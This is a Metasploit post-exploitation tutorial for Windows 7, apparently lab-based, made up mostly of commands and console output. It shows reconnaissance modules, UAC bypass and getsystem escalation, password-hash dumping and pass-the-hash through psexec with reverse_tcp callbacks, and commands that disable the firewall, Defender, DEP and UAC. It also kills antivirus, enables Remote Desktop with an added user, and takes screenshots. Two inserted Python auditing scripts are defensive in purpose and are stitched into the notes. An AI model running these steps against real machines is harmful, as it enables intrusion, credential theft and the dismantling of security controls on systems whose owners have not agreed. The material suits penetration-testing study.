Information gathering
Get the target machine's partition layout: post/windows/gather/forensics/enum_drives
Check whether it is a virtual machine: post/windows/gather/checkvm
Which services are running: post/windows/gather/enum_services
Which applications are installed: post/windows/gather/enum_applications
List shares: post/windows/gather/enum_shares
Get the host's recent activity (recent files/links): post/windows/gather/dumplinks
List installed patches: post/windows/gather/enum_patches
scraper script
winenum script
OK, let's get started.
Type run post/ and press Tab
meterpreter > run post/
Display all 229 possibilities? (y or n)
There are 229 modules available.
Now the Windows gather modules:
meterpreter > run post/windows/gather/
Display all 119 possibilities? (y or n)
gather: collection
forensics: forensic evidence gathering
meterpreter > run post/windows/gather/forensics/
run post/windows/gather/forensics/browser_history run post/windows/gather/forensics/enum_drives run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/duqu_check run post/windows/gather/forensics/imager run post/windows/gather/forensics/recovery_files
Get the partitions:
meterpreter > run post/windows/gather/forensics/enum_drives
Device Name: Type: Size (bytes):
------------ ----- -------------
<Physical Drives:>
\\.\PhysicalDrive0 4702111234474983745
<Logical Drives:>
\\.\C: 4702111234474983745
\\.\D: 4702111234474983745
Check whether it is a virtual machine:
meterpreter > run post/windows/gather/checkvm
[*] Checking if WORK-PC is a Virtual Machine ...
[+] This is a VMware Virtual Machine
List installed patches:
meterpreter > run post/windows/gather/enum_patches
[*] Patch list saved to /root/.msf4/loot/20201117105913_default_192.168.86.145_enum_patches_545017.txt
[*] KB2534111 applied
[*] KB976902 applied
Using the scripts
View basic system information:
meterpreter > run scraper
[*] New session on 192.168.86.145:49179...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\ADMINI~1\AppData\Local\Temp\znstUAlF.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Users\ADMINI~1\AppData\Local\Temp\fdJwVUXN.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Users\ADMINI~1\AppData\Local\Temp\rqIgihkj.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Users\ADMINI~1\AppData\Local\Temp\RYnqTrun.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Users\ADMINI~1\AppData\Local\Temp\TTxYTdlF.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.86.145:49179...
Go to the export directory and look at the files.
Search for related information:
run winenum
Privilege escalation
- Raise the program's run level
- UAC bypass
- Exploit a privilege-escalation vulnerability
UAC is the Yes / No dialog box that an application pops up.
Raising the program's run level
Restarts a reverse shell with higher privileges; this does not fully bypass user permissions and it triggers UAC.
Key point --> msf module: exploit/windows/local/ask
Check user privileges: getuid
Escalate privileges: getsystem
This reports an error because your privileges are insufficient.
Leave meterpreter: background
Back in the handler module;
the session is still alive.
Then load the msf module: use exploit/windows/local/ask
Set the payload:
set payload windows/x64/meterpreter/reverse_tcp
View the info: info
msf5 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
Set the session: set session 1
FILENAME: the name shown in the prompt dialog:
set filename QQ.exe
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.86.136:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading QQ.exe - 7168 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (201283 bytes) to 192.168.86.145
[*] Meterpreter session 3 opened (192.168.86.136:4444 -> 192.168.86.145:49195) at 2020-11-17 16:22:28 +0800
After the exploit runs, Win7 pops up a dialog; once the user clicks OK, getsystem can be used to escalate privileges.
msf5 exploit(windows/local/ask) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49194 (192.168.86.145)
2 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49193 (192.168.86.145)
3 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49195 (192.168.86.145)
An extra higher-privilege session, session 3, has appeared.
msf5 exploit(windows/local/ask) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: WORK-PC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
You can see it is now running with SYSTEM privileges.
The UAC level is at its Default setting, so no prompt appears.
(Win+R --> msconfig --> Tools --> Change UAC settings)
Set it to High and the prompt will appear.
- UAC bypass
back
returns to the msf prompt
msf5 > use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_dotnet_profiler
use exploit/windows/local/bypassuac_eventvwr
use exploit/windows/local/bypassuac_fodhelper
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_injection_winsxs
use exploit/windows/local/bypassuac_sdclt
use exploit/windows/local/bypassuac_silentcleanup
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_vbs
use exploit/windows/local/bypassuac_windows_store_filesys
use exploit/windows/local/bypassuac_windows_store_reg
There are this many modules.
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
Use a module, set the session, then run exploit; a new session is returned in which you can escalate directly.
meterpreter > getuid
Server username: admin-PC\admin
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
- Exploit a privilege-escalation vulnerability
ms14_058, ms16_032, ms15_051, ms16_016
msf module:
use exploit/windows/local/ms14_058_track_popup_menu
Here you land directly in a session with SYSTEM privileges.
Packet capture
Capturing:
Load the sniffer: load sniffer
List the network interfaces: sniffer_interfaces
Start capturing on interface 1: sniffer_start 1
Export the capture: sniffer_dump 1 1.cap
Decoding:
auxiliary/sniffer/psnuffle
Capture walkthrough
msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > load sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interface
[-] Unknown command: sniffer_interface.
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 2.cap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 10 packets (1679 bytes)
[*] Downloaded 100% (1679/1679)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to 2.cap
Open it with Wireshark.
Decoding walkthrough
msf5 auxiliary(sniffer/psnuffle) > set PCAPFILE /root/msf/2.cap
PCAPFILE => /root/msf/2.cap
msf5 auxiliary(sniffer/psnuffle) > exploit
Pass the Hash
The password hash format on Windows is:
username:RID:LM-hash:NT-hash
Getting the hashes:
hashdump (requires SYSTEM privileges)
run post/windows/gather/smart_hashdump
This checks the privilege level and system type,
checks whether the host is a domain controller,
and reads hashes from the registry or injects into the LSASS process:
on Server 2008 with administrator privileges it runs getsystem directly;
on Win7 with UAC off and administrator privileges it reads from the registry;
on Server 2003/XP it runs getsystem and reads the hashes from the registry.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
You can also use this post-exploitation script:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 052e64cbfb72fedce5ea362fea048f3a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WORK-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20201119162703_default_192.168.86.147_windows.hashes_043948.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter >
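As an added example (not part of these notes), a Python parser for the `username:RID:LM-hash:NT-hash:::` lines shown above that flags the two things a defender looks for in such an export: accounts whose NT hash is that of the empty password (both lab accounts above) and accounts that still have an LM hash stored. The sample input mixes the two lines from the lab output with constructed accounts (`bean`, `legacy`); the 32-hex-digit values on the constructed lines are placeholders, and `SamEntry`, `parse_hashdump` and `audit_hashdump` are names chosen here.

```python
import re
from dataclasses import dataclass
from typing import List

# Well-known constants: the LM and NT hashes of the empty password. An LM field
# equal to EMPTY_LM means no LM hash is stored (LM hashing disabled or password > 14 chars).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One hashdump line: user:RID:LM(32 hex):NT(32 hex):::
_HASHDUMP_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed hashdump output: the two lines from the lab output above plus two
# made-up accounts. The 32-hex-digit values on the made-up lines are placeholders.
SAMPLE_HASHDUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bean:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
legacy:1002:ffeeddccbbaa99887766554433221100:00112233445566778899aabbccddeeff:::
meterpreter >
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def blank_password(self) -> bool:
        # The NT hash is a deterministic function of the password, so the
        # empty-password hash identifies accounts with no password set.
        return self.nt_hash == EMPTY_NT

    @property
    def lm_hash_stored(self) -> bool:
        return self.lm_hash != EMPTY_LM


def parse_hashdump(text: str) -> List[SamEntry]:
    """Parse user:RID:LM:NT::: lines; skip status lines and prompts, reject malformed lines."""
    entries: List[SamEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[") or line.startswith("meterpreter"):
            continue  # module status output or the meterpreter prompt
        m = _HASHDUMP_LINE.match(line)
        if not m:
            raise ValueError(f"not a hashdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        entries.append(SamEntry(user, int(rid), lm.lower(), nt.lower()))
    return entries


def audit_hashdump(text: str) -> List[str]:
    """Return one finding per weakness found: blank password, LM hash still stored."""
    findings: List[str] = []
    for e in parse_hashdump(text):
        if e.blank_password:
            findings.append(f"{e.user} (RID {e.rid}): blank password")
        if e.lm_hash_stored:
            findings.append(f"{e.user} (RID {e.rid}): LM hash stored, legacy hash is trivially crackable")
    return findings


if __name__ == "__main__":
    for finding in audit_hashdump(SAMPLE_HASHDUMP):
        print(finding)
```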
We already have the privileges, so why crack the password?
To reduce the chance of being detected.
Weak-password guessing can also be attempted.
Hash cracking:
Offline: findmyhash (a Kali tool), L0phtCrack
Pass the hash: log in using the hash value
psexec: exploit/windows/smb/psexec
msf5 exploit(multi/handler) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.86.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.86.147
RHOSTS => 192.168.86.147
msf5 exploit(windows/smb/psexec) >
Check whether port 445 is open:
root@localhost:~# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49203 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49202 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49200 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49204 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49201 ESTABLISHED off (0.00/0/0)
tcp6 0 0 :::111 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:111 0.0.0.0:* off (0.00/0/0)
udp 0 0 192.168.86.136:68 192.168.86.254:67 ESTABLISHED off (0.00/0/0)
udp6 0 0 :::111 :::* off (0.00/0/0)
raw6 0 0 :::58 :::* 7 off (0.00/0/0)
How do you open it?
- 1. First install the ufw command:
# apt-get install ufw
- 2. Examples of ufw usage:
Check firewall status (inactive by default): # ufw status
Firewall version: # ufw version
Enable the ufw firewall: # ufw enable
Disable the ufw firewall: # ufw disable
Deny all incoming by default: # ufw default deny
Allow port 22/TCP: # ufw allow 22/tcp
Allow port 53 (tcp/udp): # ufw allow 53
Deny external access to port 3306: # ufw deny 3306
Delete a rule that was added: # ufw delete allow 22
Allow this IP to reach all local ports: # ufw allow from 192.168.1.100
Delete the rule above: # ufw delete allow from 192.168.1.100
Show rules with line numbers: # ufw status numbered
Delete rule number 3: # ufw delete 3
Turn off ufw: # ufw disable
Deny access to port 8888: # ufw deny 8888
Allow TCP port 22 from 192.168.0.1: # ufw allow proto tcp from 192.168.0.1 to any port 22
root@localhost:~# ufw allow 445
Rules updated
Rules updated (v6)
Then continue:
msf5 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee
SMBPass => aad3b435b51404eeaad3b435b51404ee
msf5 exploit(windows/smb/psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf5 exploit(windows/smb/psexec) > set payload
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.86.147 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass aad3b435b51404eeaad3b435b51404ee no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.86.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) >
Disabling UAC via the registry on Win7:
First press Win+R to open the Run dialog, type "regedit" and click OK to open the Registry Editor.
In the Registry Editor window, expand "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" in the left pane;
then in the right pane find the three values "ConsentPromptBehaviorAdmin", "EnableLUA" and "PromptOnSecureDesktop"; right-click each, choose "Modify", set "Value data" to "0" and click OK.
This can also be changed from a shell once you have obtained one.
Go to the system32 directory:
C:\Windows\system32>reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The operation completed successfully.
C:\Windows\system32>
If the output is garbled, run chcp 65001 first;
that fixes it.
View the syntax of reg add:
C:\Windows\system32>reg add /?
reg add /?
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the
current machine. Only HKLM and HKU are available on remote
machines.
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY.
/v The value name, under the selected Key, to add.
/ve adds an empty value name (Default) for the key.
/t RegKey data types
[ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ |
REG_DWORD | REG_QWORD | REG_BINARY | REG_NONE ]
If omitted, REG_SZ is assumed.
/s Specify one character that you use as the separator in your data
string for REG_MULTI_SZ. If omitted, use "\0" as the separator.
/d The data to assign to the registry ValueName being added.
/f Force overwriting the existing registry entry without prompt.
Examples:
REG ADD \\ABC\HKLM\Software\MyCo
Adds a key HKLM\Software\MyCo on remote machine ABC
REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
Adds a value (name: Data, type: REG_BINARY, data: fe340ead)
REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Adds a value (name: MRU, type: REG_MULTI_SZ, data: fax\0mail\0\0)
REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Notice: Use the caret symbol ( ^ ) inside the expand string
C:\Windows\system32>
/v the value name to modify
/t the data type of the value
/d the data to assign to the registry value being added
/f overwrite the existing registry entry without prompting
Since it reported success, go and check it.
Very nice.
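As an added example (not from these notes), a Python check that parses the output of `reg query` for the Policies\System key above and reports whether any of the three values have been set to 0, the way a defender would audit a host for exactly this change. The two `reg query` samples are constructed; when a value is absent from the key the check assumes the stock Windows defaults (EnableLUA=1, ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1), and the function names are chosen here.

```python
import re
from typing import Dict, List

# The key the notes above edit.
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Stock Windows defaults, used when a value is absent from the key (assumption: Win7+ defaults).
UAC_DEFAULTS = {
    "EnableLUA": 1,                    # UAC on
    "ConsentPromptBehaviorAdmin": 5,   # prompt for consent for non-Windows binaries
    "PromptOnSecureDesktop": 1,        # show the prompt on the secure desktop
}

# Constructed `reg query <UAC_KEY>` output from a host where the three values were
# set to 0 as the notes describe (hypothetical host, not the page's own output).
SAMPLE_DISABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x0
    EnableLUA    REG_DWORD    0x0
    PromptOnSecureDesktop    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
"""

# Constructed output from a host with stock settings (EnableLUA absent -> default 1).
SAMPLE_DEFAULT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

# One `reg query` value line: indented name, type and data separated by runs of spaces.
_VALUE_LINE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*?)\s*$")


def parse_reg_query(text: str) -> Dict[str, int]:
    """Return {value name: integer data} for the DWORD/QWORD values in reg query output."""
    values: Dict[str, int] = {}
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if not m:
            continue  # key header line or blank line
        name, reg_type, data = m.groups()
        if reg_type in ("REG_DWORD", "REG_QWORD"):
            values[name] = int(data, 16)  # reg query prints these as 0x...
    return values


def audit_uac(values: Dict[str, int]) -> List[str]:
    """Report each UAC value that weakens or disables UAC, in a fixed order."""
    effective = {name: values.get(name, default) for name, default in UAC_DEFAULTS.items()}
    findings: List[str] = []
    if effective["EnableLUA"] == 0:
        findings.append("EnableLUA=0: UAC is disabled; admin processes run fully elevated "
                        "with no consent prompt (takes effect after reboot)")
    if effective["ConsentPromptBehaviorAdmin"] == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: elevation requests are granted without any prompt")
    if effective["PromptOnSecureDesktop"] == 0:
        findings.append("PromptOnSecureDesktop=0: the consent prompt appears on the normal desktop, "
                        "where other processes can interact with it")
    return findings


def audit_reg_query_output(text: str) -> List[str]:
    """Parse reg query output and audit the UAC values in it."""
    return audit_uac(parse_reg_query(text))


if __name__ == "__main__":
    for label, sample in (("disabled", SAMPLE_DISABLED), ("default", SAMPLE_DEFAULT)):
        print(label, audit_reg_query_output(sample) or ["no UAC weakening found"])
```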
There is an auxiliary module for guessing weak passwords:
auxiliary/analyze/jtr_crack_fast
Disabling antivirus and the firewall
Must be done inside Windows --> turn off the firewall:
netsh advfirewall set allprofiles state off (requires administrator privileges or higher)
Must be done inside Windows --> stop Defender (a built-in Windows service):
net stop windefend (check the actual service name)
Must be done inside Windows --> turn off DEP (Data Execution Prevention, a Windows security mechanism):
bcdedit.exe /set {current} nx AlwaysOff
meterpreter module --> kill antivirus:
run killav
run post/windows/manage/killav
Getting started
Turning off the firewall
Confirm that the Win7 firewall is on.
Enter the shell:
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.
C:\Windows\system32>
The firewall is now off.
Check whether the service is running:
services.msc
C:\Windows\system32>net stop windefend
net stop windefend
The service name is invalid.
More help is available by typing NET HELPMSG 2185.
because this service does not exist on the target machine.
Turning off DEP
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
bcdedit.exe /set {current} nx AlwaysOff
The operation completed successfully.
C:\Windows\system32>
Killing antivirus
meterpreter > run post/windows/manage/killava
[-] The specified meterpreter session script could not be found: post/windows/manage/killava
meterpreter >
Because there is no antivirus software on the target...
Enabling Remote Desktop
run post/windows/manage/enable_rdp
(Cleaning up traces: run multi_console_command -h, run multi_console_command -r /root/.msf4/loot/20200921222458_default_192.168.2.143_host.windows.cle_083768.txt)
run getgui -e (run getgui -h)
Enable Remote Desktop and add a new user:
run getgui -u bean -p ean
Enable Remote Desktop and forward it to port 8888:
run getgui -e -f 8888
Check whether the target has Remote Desktop enabled:
see whether port 3389,
the Remote Desktop port, is open.
Here you can also see that it is not enabled.
Run: run post/windows/manage/enable_rdp
You can see it is now enabled.
Reverting Remote Desktop: run multi_console_command -h
shows the help for the command.
Reverting Remote Desktop: run multi_console_command -r /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
meterpreter > run multi_console_command -h
Console Multi Command Execution Meterpreter Script
OPTIONS:
-c <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma.
-h Help menu.
-r <opt> Text file with list of commands, one per line.
-s Hide commands output for work in background sessions
meterpreter > run multi_console_command -r /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 3584 created.
Another way: run getgui
meterpreter > run getgui -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.
meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20201124.1449.rc
meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20201124.1449.rc
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 1804 created.
meterpreter >
Enable Remote Desktop and add a new user: run getgui -u bean -p ean
Enable Remote Desktop and forward it to port 8888: run getgui -e -f 8888
Linux command for connecting to a Windows remote desktop:
rdesktop
root@localhost:~# rdesktop -h
rdesktop: A Remote Desktop Protocol client.
Version 1.8.6. Copyright (C) 1999-2011 Matthew Chapman et al.
See http://www.rdesktop.org/ for more information.
Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell / seamless application to start remotly
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-i: enables smartcard authentication, password is used as pin
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: path to SeamlessRDP shell, this enables SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-t: disable use of remote ctrl
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-r: enable specified device redirection (this flag can be repeated)
'-r comport:COM1=/dev/ttyS0': enable serial redirection of /dev/ttyS0 to COM1
or COM1=/dev/ttyS0,COM2=/dev/ttyS1
'-r disk:floppy=/mnt/floppy': enable redirection of /mnt/floppy to 'floppy' share
or 'floppy=/mnt/floppy,cdrom=/mnt/cdrom'
'-r clientname=<client name>': Set the client name displayed
for redirected disks
'-r lptport:LPT1=/dev/lp0': enable parallel redirection of /dev/lp0 to LPT1
or LPT1=/dev/lp0,LPT2=/dev/lp1
'-r printer:mydeskjet': enable printer redirection
or mydeskjet="HP LaserJet IIIP" to enter server driver as well
'-r sound:[local[:driver[:device]]|off|remote]': enable sound redirection
remote would leave sound on server
available drivers for 'local':
alsa: ALSA output driver, default device: default
'-r clipboard:[off|PRIMARYCLIPBOARD|CLIPBOARD]': enable clipboard
redirection.
'PRIMARYCLIPBOARD' looks at both PRIMARY and CLIPBOARD
when sending data to server.
'CLIPBOARD' looks at only CLIPBOARD.
'-r scard[:"Scard Name"="Alias Name[;Vendor Name]"[,...]]
example: -r scard:"eToken PRO 00 00"="AKS ifdh 0"
"eToken PRO 00 00" -> Device in Linux/Unix enviroment
"AKS ifdh 0" -> Device shown in Windows enviroment
example: -r scard:"eToken PRO 00 00"="AKS ifdh 0;AKS"
"eToken PRO 00 00" -> Device in Linux/Unix enviroment
"AKS ifdh 0" -> Device shown in Windows enviroment
"AKS" -> Device vendor name
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)
-o: name=value: Adds an additional option to rdesktop.
sc-csp-name Specifies the Crypto Service Provider name which
is used to authenticate the user by smartcard
sc-container-name Specifies the container name, this is usally the username
sc-reader-name Smartcard reader name to use
sc-card-name Specifies the card name of the smartcard to use
root@localhost:~#
-u: the target's username
-p: the target's password
followed by the target's IP address
When you do not have permission to enable its Remote Desktop:
load espia (load the plugin)
screengrab
You can try these two commands to take a screenshot of its desktop.
meterpreter > screengrab
Screenshot saved to: /root/CMkdxkkF.jpeg
Open the image with:
eog /root/CMkdxkkF.jpeg
Trying the plugin's screenshot:
meterpreter > load espia
Loading extension espia...Success.
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
